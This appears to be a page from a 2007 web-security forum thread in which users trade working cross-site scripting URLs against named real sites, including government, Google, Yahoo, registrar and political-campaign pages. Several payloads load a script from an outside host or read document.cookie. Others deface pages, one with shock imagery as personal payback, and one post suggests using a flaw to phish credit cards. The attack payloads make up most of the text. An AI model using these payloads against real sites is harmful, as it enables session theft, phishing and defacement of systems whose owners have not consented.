Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...3536373839404142434445...LastNext
Current Page: 40 of 65
Re: So it begins
Posted by: kirke
Date: February 18, 2007 02:36PM

this one is nice too
(XSS script seen it elsewhere and usage shameless stolen:)

http://www.bmsg.gv.at/cms/site/search.html?query=xss%22%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

If you look at the returned source, you see that there're some more injections possible. And you also see that the web developpers know how to proper encode the data, at least they write it into the HTML comments, heavan knows what's that usefull for ..

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: February 18, 2007 02:52PM

http://www.justiz.gv.at/service/content.php?v_search=xss%22%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

original POST converted to GET, and another example for some stupid php "sanitations" (useless as we all know:)

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: February 18, 2007 03:16PM

The <title> says ..

http://www.bmlv.gv.at/suche/index.php?query_string=XSS%22%3E%3C/title%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=http://files.die-welt.net/s.js%3E%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: Lockdown
Date: February 18, 2007 03:20PM

kirke Wrote:
-------------------------------------------------------
> http://www.justiz.gv.at/service/content.php?v_sear
> ch=xss%22%3E%3Cscript%20src=http://files.die-welt.
> net/s.js%3E%3C/script%3E
>
> original POST converted to GET, and another
> example for some stupid php "sanitations" (useless
> as we all know:)


Eh, it's just stupid coders using $_REQUEST[] instead of $_POST

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: February 18, 2007 03:24PM

s/just/additional/

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: February 19, 2007 04:59PM

[1] http://www.jordanmatter.com/view.asp?url=><script>alert('xss')</script><p

I'm sure there's a null byte error here as well, I haven't quite figured it out yet....

[2] http://europe.nokia.com/A4164022?url=http'%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%22%61%6C%65%72%74%28%27%78%73%73%27%29%3B%22%20%69%64%3D%27

That one is kinda nasty because simply changing the url value to the url for some/any file, will cause the user to d/l that file upon clicking the button. (example: http://europe.nokia.com/A4164022?url=http://ckers.org/s.js downloads s.js from ckers.org)

[3] http://www.onemotoring.com.sg/publish/onemotoring/en/popupwebwide/emailurl.popup.html?url=<script>alert('xss')</script> <-- This is great, send xss to your friends!

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 02/19/2007 06:15PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: Lockdown
Date: February 20, 2007 07:43AM

that europe nokia one could be improved on. It's nasty just for downloading trojans and stuff, which would be very bad, but also, to make it just more instajavascripty

http://europe.nokia.com/A4164022?url=javascript:alert(%22XSS%22);


or, just onload
http://europe.nokia.com/A4164022?url='%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cspan

Whateva floats yo boat ;-)

-Lockdown-

http://www.rawrcore.net

Options: ReplyQuote
Re: So it begins
Posted by: christ1an
Date: February 20, 2007 11:12AM

Snap:
http://www.snap.com/php/widgets/no_results.php?query=%3Cscript%3Ealert('xss');%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: February 20, 2007 03:02PM

http://search.cityguide.aol.com/baltimore/search/search.adp?page=%6C%69%73%74%69%6E%67%73%4C%6F%6E%67%22%3B%61%6C%65%72%74%28%27%78%73%73%27%29%3B%69%3D%22 <- This of course works when searching in any city

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: blad3
Date: February 20, 2007 04:23PM

I was browsing the pages tagged with xss on del.icio.us and found this:

http://www.google.com/bookmarks/?num=1%22</script><script>alert('xss')</script>
http://del.icio.us/kimoto

It seems to work if you are logged on into Google Bookmarks.

It was used to run this script (to display a fake Google TV :P)
http://hamachiya.com/junk/gtv

Update:
Both Google XSS-es are fixed now.



Edited 3 time(s). Last edit at 02/21/2007 12:13AM by blad3.

Options: ReplyQuote
Re: So it begins
Posted by: nEUrOO
Date: February 20, 2007 06:03PM

Another Google one: Google Search History (you need to subscribe to this service):
http://www.google.com/searchhistory/?hl=en&num=%22%3Cscript%3Ealert('XSS');%3C/script%3E

Btw, this is the same parameter...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 02/20/2007 06:14PM by nEUrOO.

Options: ReplyQuote
Re: So it begins
Date: February 20, 2007 06:16PM

I played with this one for a while, and they filtered script tags, single quotes, and escaped double quotes. HTML worked fine though.

http://www.bleacheatingfreaks.com/showPic.php?pic=http://ha.ckers.org<meta http-equiv=refresh content=1;url=http://www.awesomeandrew.net/>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: February 20, 2007 10:07PM

Specially for jungsonn

http://www.redsonn.com/hi/go.php?mickey=&mouse=%27%3C%2Fscript%3E%3Cscript%3Ealert%28String.fromCharCode%2872%2C73%29%29%3C%2Fscript%3E%3B&submit=Foo+this%21

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: ryduh
Date: February 21, 2007 12:12AM

http://fusion.kallback.com/k7/vanity3.cfm?DID=111111"><script>alert('xss');</script>"1111

---------
Patience is a waste of time.

Options: ReplyQuote
Re: So it begins
Date: February 21, 2007 10:41AM

http://saybox3.co.uk/checkuser.php?username=<script>alert('Hopefully you will see this on your logs, and fix the hole.');location.href='http://www.awesomeandrew.net';</script>&name=&age=


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: February 21, 2007 02:26PM

Search FBN-Security Bloggers Network:
http://www.lijit.com/pvs/FBN-Security%20Bloggers%20Network?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%7D&pvssearchtype=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%7D

Found here:
http://jeremiahgrossman.blogspot.com/2007/02/automated-scanners-vs-low-hanging-fruit.html#links

;)

Greetings,
.mario

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: February 21, 2007 07:32PM

http://www.ctcvista.org/directory/organizations?sort=desc&order=Organization"onload="alert('xss');

Why oh why would somebody echo the url (unfiltered) into the <body> tag as its id?!

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: daltd
Date: February 21, 2007 08:13PM

Namecheap.com uses HelpSpot for their support center which is vulnerable to XSS.
[[url=http://www.namecheap.com/support/index.php?pg=request.check&id=%3C/title%3E%3C/head%3E%3Cbody%20onload=%22javascript:document.title='Namecheap.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Cbr%3Edaltd%20uNF!';%22%3E&submit=Check]www.namecheap.com[/url]]

[[url=https://www.godaddy.com/gdshop/radio/popup_pic.asp?se=%2B&ci=5291&app_hdr=0&display=../img_posterlrg.png%22%3E%3Cbody%20onload=%22javascript:document.title='GoDaddy.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!';%22%3E%3Cdiv%20id=%22]www.godaddy.com[/url]]
[[url=https://www.networksolutions.com/help/sales-contact.jsp?callingPage=%22%3E%3Cbody%20onload=%22javascript:document.title='Networksolutions.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF%3C/center%3E';%22%3E]www.networksolutions.com[/url]]
[[url=http://marketplacepro.moniker.com/search/cat/11243936/keyword/s:%3Cbody%20onload=%22document.title='marketplacepro.moniker.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Cbr%3Edaltd&nbsp;uNF!';%22%3E/]marketplacepro.moniker.com[/url]]
[[url=https://www.namesecure.com/en_US/jhtml/dcs-docs/whois_popup.jhtml?domainname=%22%3E%3Cbody%20onload=%22javascript:document.title='NameSecure.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&tld=com]www.namesecure.com[/url]]
[[url=http://www.enom.com/auctions/auctions.asp?page=premium&type=%3C/script%3E%3Cbody%20onload=%22javascript:document.title='eNom.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E]www.enom.com[/url]]
[[url=https://secure.registerapi.com/KM/KnowledgeBase/script_search_documents.php?account_name=4798&search_advanced=0&search_type=data_keywords&search_string=%22%3E%3Cscript%3Edocument.title='secure.registerapi.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%3C/script%3E]secure.registerapi.com[/url]]



Edited 6 time(s). Last edit at 02/23/2007 08:46PM by daltd.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: February 22, 2007 04:36PM

Hello China!
------------

http://search.zol.com.cn/s/search.php?keyword=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

http://bbs.book.sina.com.cn/?h=javascript:alert('xss');document.location='http://www.google.com';

http://watsagri.nstl.gov.cn/SPT--QuickSearch.php?F_SearchString=<script>alert(String.fromCharCode(88,83,83))//</script>

http://www.whjtj.gov.cn/search.php?type=&keyword=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

http://passport.pchome.net/login.php?username="><script>alert('hello%20pxss')</script><p%20id="
^ This one is kind of interesting, doesn't alert on the page at passport.pchome.net, but if the user then navigates to my.pchome.net the script executes (IE only, I think... couldn't make FF alert, but I could see that the vector persists through the subdomains.)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/22/2007 04:36PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: daltd
Date: February 22, 2007 06:20PM

[[url=https://www.joker.com/faq/index.php?search=%3Cbody%20onload=%22javascript:document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&num=50]www.joker.com[/url]]
[[url=http://www.sedo.com/faq/index.php?action=search&suchbegriff=%22%3E%3Cscript%3Edocument.body.innerHTML=String.fromCharCode(60,99,101,110,116,101,114,62,60,98,114,62,100,97,108,116,100,32,117,78,70,33,60,98,114,62,60,98,114,62);%3C/script%3E]www.sedo.com[/url]]
[[url=http://www.registar.com/mydomains.cgi?email=domain@domain.com%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E]www.registar.com[/url]]
[[url=https://secure.directnic.com/help/faq/search.php?search=domain.com%22%3E%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E%3Cdiv%20id=%22]secure.directnic.com[/url]]
[[url=http://www.history.com/cite.do?title=%3Cbody%20onload=%22javascript:document.title='History.com%20-%20XSS%20PoC';%20document.body.innerHTML='<center><br>daltd%20uNF!</center>';%22%3E&url=http://sla.ckers.org/]www.history.com[/url]]



Edited 2 time(s). Last edit at 02/23/2007 08:44PM by daltd.

Options: ReplyQuote
Re: So it begins
Posted by: SystemOfAHack
Date: February 22, 2007 07:13PM

Nice findings daltd ;p

Here's something for people to try if you're short on xss-worth-while sites. Make a list of all the websites that come up during tv commercials :p
I'm sure I found a little something in lloydstsb.com the other day. Anyway, here's one for starters:

http://www.channel4.com/entertainment/games/chart.jsp?genre=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: daltd
Date: February 23, 2007 02:03AM

SystemOfAHack, thanks.

[[url=http://www.facebattle.com/registercomplete.aspx?emailaddress=domain@domain.com%22%3Cscript%3Edocument.title='facebattle.com%20-%20daltd';%20alert('xss');%3C/script%3E]www.facebattle.com[/url]]
[[url=http://www.catholic.net/linksframe.phtml?link=Catholic.net%20-%20XSS%20PoC%3C/title%3E%3C/head%3E%3Cbody%20onload=%22javascript:document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3Cbr%3E%3Cimg%20src=http://mad.girls-eater.com/dtr/thumbs/ce2e62.jpg%3E%3C/center%3E';%22%3E%3Cdiv%20id=%22]www.catholic.net[/url]]
[[url=http://www.kidney.org/site/exit_page.cfm?ch=203&link=domain.com%22%3E%3Cbody%20onload=%22javascript:document.title='Kidney.org%20-%20National%20Kidney%20Foundation%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E%3Cdiv%20id=%22]www.kidney.org[/url]]
[[url=http://content.scholastic.com/browse/searchHelp.jsp?query=%3Cbody%20onload=%22javascript:document.title='content.scholastic.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E]content.scholastic.com[/url]]
[[url=http://videosearch.comcast.net/ss-query/videosearch.jsp?q=%22%3E%3Cbody%20onload=%22javascript:document.title='videosearch.comcast.net%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E%3Cdiv%20id=%22]videosearch.comcast.net[/url]]

I would also like to mention that all the comcast.com and comcast.net XSS vulnerabilities posted here are still %100 working at the time of this post, if anyone cares: [[url=http://sla.ckers.org/forum/read.php?3,44,4045#msg-4045]1[/url]] [[url=http://sla.ckers.org/forum/read.php?3,44,812#msg-812]2[/url]] [[url=http://sla.ckers.org/forum/read.php?3,44,796#msg-796]3[/url]]

later.

Options: ReplyQuote
Re: So it begins
Date: February 23, 2007 11:48AM

Do me a favor, and continually visit this one until Google decides to put it up on their results. If you are religious, offended by Atheism, or would become sick at the sight of Goatse, don't click it. I just figured I'd provide some payback for the call I received on my cell phone.

http://www.krks.com/common/player/swn/CustomPlayer.asp?url=&MinTitle=</title>Awesome%20AnDrEw%20says,%20"Don't%20ever%20call%20my%20phone%20asking%20if%20I've%20been%20forgiven%20by%20the%20"Savior%20Jesus%20Christ".%20Do%20I%20call%20you%20wondering%20whether%20you've%20learned%20that%20the%20bullshit%20you've%20been%20force%20fed%20your%20entire%20life%20has%20taken%20hold%20of%20your%20free%20will?%20Don't%20fucking%20solicit%20me%20again,%20thanks.<br><img%20src="http://www.goatse.cz/hello.jpg"><!--


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins
Posted by: bubbles
Date: February 23, 2007 04:22PM

http://www.ticketweb.com/user/?region=xxx&query=search&category=misc&search=%3Cscript%3E+alert%28%27xss%27%29%3B%3C%2Fscript%3E&searchregion=xxx&genre=none&beginmonth=02&beginday=23&beginyear=2007&endmonth=02&endday=23&endyear=2008&sortorder=0
http://www.tickets.com/search.cgi?q=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

Would be interesting to hack a bands myspace and post a link to "Buy Tickets" for some show... Then just phish CC and stuff.

-bubbles
http://webmastertutorials.net



Edited 1 time(s). Last edit at 02/23/2007 04:28PM by bubbles.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: February 23, 2007 04:27PM

http://www.blinkbits.com/search/search.php?q=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E
http://www.merck.com/mrksearch/SearchServlet?HeaderImage=&HeaderImageAlt=&qt=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22%20
http://monsanto.mediaroom.com/index.php?s=43"><script>alert('xss1');</script>&item=457"><script>alert('xss2');</script> <- doesn't work in FF
http://monsanto.mediaroom.com/index.php?s=82&query=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22

[Edit: let's add a few more..]
http://www.halliburton.com/default/main/halliburton/eng/news/source_files/news.jsp?newsurl=javascript:alert('xss');
http://www.halliburton.com/default/main/halliburton/eng/news/source_files/news.jsp?newsurl=--%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C!-- <-same variable, different area in the page.

http://www.carlyle.com/eng/search/default.asp?SearchText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E%3Cp+id%3D%22&SubmitButton.x=31&SubmitButton.y=8
http://my.barackobama.com/page/user/manage?uu=%22%00%0a%0d%3e%3C%2F%6E%6F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3B%3C%2F%73%63%72%69%70%74%3E [Login with the following info and it will gladly redirect you to the exploit U:jquest@mytrashmail.com P:hajji ]
http://www.votehillary.org/CMS/forward/%3Cimg%20src=%22fds%22onerror=%22alert(String.fromCharCode(88,83,83))%22%3E
http://www.draftrudygiuliani.com/read_article.php?id=655%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%38%38%2C%38%33%2C%38%33%29%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%70%25%32%30%69%64%3D%22
http://www.gohunter08.com/comtools/e-photogallery/displayContent.asp?action=1C0A0E1D0C07&text=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cp%20id=%22

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 02/23/2007 07:31PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: daltd
Date: February 23, 2007 08:43PM

Looks like Namecheap removed the software they were using for their support system so the previous XSS vulnerability I posted is no longer active, either way here's another one I found:

[[url=https://www.namecheap.com/domain-pricing.asp?fieldno=0&orderby=ASC&Pane=show&tld=cc%22%3E%3Cbody%20onload=%22document.title='Namecheap.com%20-%20XSS%20PoC';%20document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E&pricefor=register]www.namecheap.com[/url]]

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: February 24, 2007 04:42AM

With all the recent stuff surrounding google i thought i would check out how secure yahoo was in comparison... cause I have never really bothered to audit the domain so to speak. anyways within 5 minutes i had my first xss.

http://cosmos.bcst.yahoo.com/scp_v3/viewer/index.php?pid=16471&rn=248153;alert(document.cookie);p=1&cl=1939839&ch=248154

hopefully there is many more to come.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: daltd
Date: February 24, 2007 07:12AM

[[url=http://www.realpics.net/forums/28/105148/edit/?');document.title=String.fromCharCode(82,101,97,108,112,105,99,115,46,110,101,116,32,45,32,88,83,83,32,80,111,67);document.body.innerHTML=String.fromCharCode(60,99,101,110,116,101,114,62,60,98,114,62,100,97,108,116,100,32,117,78,70,33);alert('XSS]www.realpics.net[/url]] : Click on the Alert Moderator link
[[url=http://www.imdb.com/gallery/granitz/5335/FreddyRodr_Grani_11250280_400.jpg.html?path=%22%3E%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22XSS%22)%3C/SCRIPT%3E]www.imdb.com[/url]]
[[url=http://javascript.about.com/gi/dynamic/offsite.htm?site=XSS%20PoC%3C/title%3E%3C/head%3E%3Cbody%20onload=%22document.body.innerHTML='%3Ccenter%3E%3Cbr%3Edaltd%20uNF!%3C/center%3E';%22%3E]javascript.about.com[/url]]

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: February 24, 2007 08:20AM

#2 for yahoo \0/

this one is a two parter in that it requires you to click the link returned from the 302 response. Tried all type of response splitting with no luck.

http://shopping.yahoo.co.uk/ctl/go/displayLink?link=javascript:alert('xss');

EDIT [Appears to affect all yahoo "shopping" domains - making it effective against all Yahoo sites.. except the .com version :( here are a couple]
http://shopping.yahoo.it/ctl/go/displayLink?userClick=true&link=javascript:alert('xss');
http://shopping.yahoo.no/ctl/go/displayLink?link=javascript%3Aalert%28%27xss%27%29%3B


Thank you apache for default configuration settings and yahoo for not implementing standardized error pages across all their servers.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 02/24/2007 08:42AM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: February 24, 2007 05:36PM

http://www.esso.de/cgi-bin/htsearch.cgi?config=esso.de-htdig&restrict=http%3A%2F%2Fwww.esso.de%2F&exclude=&words=%22%3E%3Cdiv+style%3D%22position%3Aabsolute%3B+top%3A+0px%3B+left%3A+0px%3B+width%3A+100%25%3B+height%3A+100%25%3B+background-color%3A+%23f00%3B%22%3Epwned%3C%2Fdiv%3E&x=0&y=0

Options: ReplyQuote
Pages: PreviousFirst...3536373839404142434445...LastNext
Current Page: 40 of 65


Sorry, only registered users may post in this forum.